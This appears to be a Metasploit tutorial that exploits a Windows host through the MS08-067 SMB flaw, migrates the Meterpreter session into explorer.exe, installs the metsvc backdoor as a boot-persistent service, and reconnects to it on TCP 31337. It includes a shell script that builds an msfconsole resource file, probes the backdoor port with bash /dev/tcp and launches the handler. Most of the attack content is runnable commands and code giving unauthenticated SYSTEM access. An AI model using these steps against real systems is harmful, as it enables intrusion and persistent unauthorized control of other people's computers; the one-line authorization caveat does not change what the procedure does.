Let's start. You can launch the Metasploit Framework either from the Applications menu or from the command line. From the Applications menu, go to Applications -> BackTrack -> Exploitation Tools -> Network Exploitation Tools -> msfconsole; from a terminal, simply run msfconsole.
At the msf prompt, select the exploit: msf > use exploit/windows/smb/ms08_067_netapi
First, we exploit the remote system (point RHOST at the target and run exploit) to obtain a Meterpreter session.
Next, issue the “ps” command to list the running processes. Once the process list is displayed, migrate into explorer.exe with “migrate 1472” (1472 is the PID that ps reported for explorer.exe on our target; use whatever PID your own listing shows). Migrating matters because our session currently lives inside the exploited service process: if the user notices that the service has stopped responding and kills it, we would lose the session, whereas explorer.exe stays alive for as long as the user is logged on.
Cool! We have successfully migrated into “explorer.exe”. Now it is time to get down to real business, i.e. installing a backdoor on the remote host. To install the backdoor, type the following command:
meterpreter > run metsvc
If all goes well, the script's output (shown in the original screenshot) confirms that the Meterpreter backdoor has been installed; metsvc registers itself as a Windows service so that it starts automatically at boot.
Now, let's look at the backdoor on the remote system. Its files were dropped into a randomly named folder, in our case “BNUhuhnG”, under the Temp directory of C:\WINDOWS.
After installing the backdoor on the remote system, I restart the remote PC. The reason for restarting is to check whether the backdoor I installed survives a reboot and still works. Now it is time to connect to the backdoor we created in order to regain access to the remote PC. For that we use the generic handler module, exploit/multi/handler, together with the matching payload. We select the handler module first:
After the handler module has been selected, the next step is to set the payload:
set PAYLOAD windows/metsvc_bind_tcp
Now we check the required options with the “show options” command.
Next we need to specify RHOST and LPORT in order to reach the backdoor. We set RHOST to 192.168.2.9 (the target) and LPORT to 31337. Note that with a bind payload LPORT is the port the backdoor listens on on the target, not a port on our own machine: the metsvc service listens on TCP 31337 by default, so LPORT must be set to 31337 or the handler will never connect and no Meterpreter session will be created.
Now comes the final step. To get the Meterpreter session back, just run the handler against the target by typing the command: exploit
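The reconnection steps above, collected into an msfconsole resource script you can replay instead of retyping them (an added example, not code from the original post or from the Metasploit project). Assumptions: the target address 192.168.2.9 and port 31337 are the post's lab values, the helper names make_metsvc_rc, rc_get and probe_port are mine, and the reachability probe relies on bash and coreutils timeout being installed on the attacking machine.

```shell
#!/bin/sh
# Added example (not from the original post): generate the msfconsole
# resource script for reconnecting to a metsvc backdoor, and optionally run it.
set -eu

# Build an msfconsole resource (.rc) file equivalent to typing the handler
# commands interactively. $1 = target IP, $2 = port metsvc listens on,
# $3 = output path. Prints the path so callers can chain it.
make_metsvc_rc() {
  rhost="$1"; lport="$2"; out="$3"
  # metsvc has no option to change its port, so anything other than 31337
  # means the handler will never connect; warn rather than silently proceed.
  if [ "$lport" != "31337" ]; then
    echo "warning: metsvc listens on 31337 by default; LPORT=$lport is unlikely to work" >&2
  fi
  cat > "$out" <<EOF
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set RHOST $rhost
set LPORT $lport
show options
exploit
EOF
  printf '%s\n' "$out"
}

# Return the value of a "set NAME value" line from a resource file, so a
# caller (or a test) can confirm what the handler will actually use.
rc_get() {
  rc="$1"; name="$2"
  awk -v n="$name" '$1 == "set" && $2 == n { print $3 }' "$rc"
}

# Quick reachability check of the bind port before starting msfconsole.
# Uses bash's /dev/tcp so it needs no netcat; prints "open" or "closed".
probe_port() {
  host="$1"; port="$2"
  if timeout 3 bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null; then
    echo open
  else
    echo closed
  fi
}

# Usage: RHOST=192.168.2.9 sh metsvc_reconnect.sh --run
# (192.168.2.9 is the lab address used in the post; change it for your target)
if [ "${1:-}" = "--run" ]; then
  target="${RHOST:-192.168.2.9}"
  port="${LPORT:-31337}"
  rc=$(make_metsvc_rc "$target" "$port" "$(mktemp /tmp/metsvc.XXXXXX)")
  echo "port $port on $target is: $(probe_port "$target" "$port")"
  msfconsole -q -r "$rc"
fi
```

The probe is worth running first: because metsvc_bind_tcp connects out to the target, a closed or filtered 31337 (host still rebooting, firewall rule, service not started) shows up as the handler silently failing, and a two-second TCP check tells you which problem you are looking at.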
And here we go… the handler connected to the backdoor and we have our Meterpreter session again. In Windows Task Manager on the victim/target host you can see the metsvc-server.exe process that the service spawned to serve our session.
Great! We can now get back into the victim's PC whenever we want, and because metsvc runs as a Windows service, the session it hands us runs as SYSTEM. Keep in mind that the metsvc listener is unauthenticated: anyone who can reach TCP 31337 on that host gets the same session, so only leave it on machines you are authorized to test, and remove it when you are done (“run metsvc -r” uninstalls the service; the dropped files must be deleted by hand).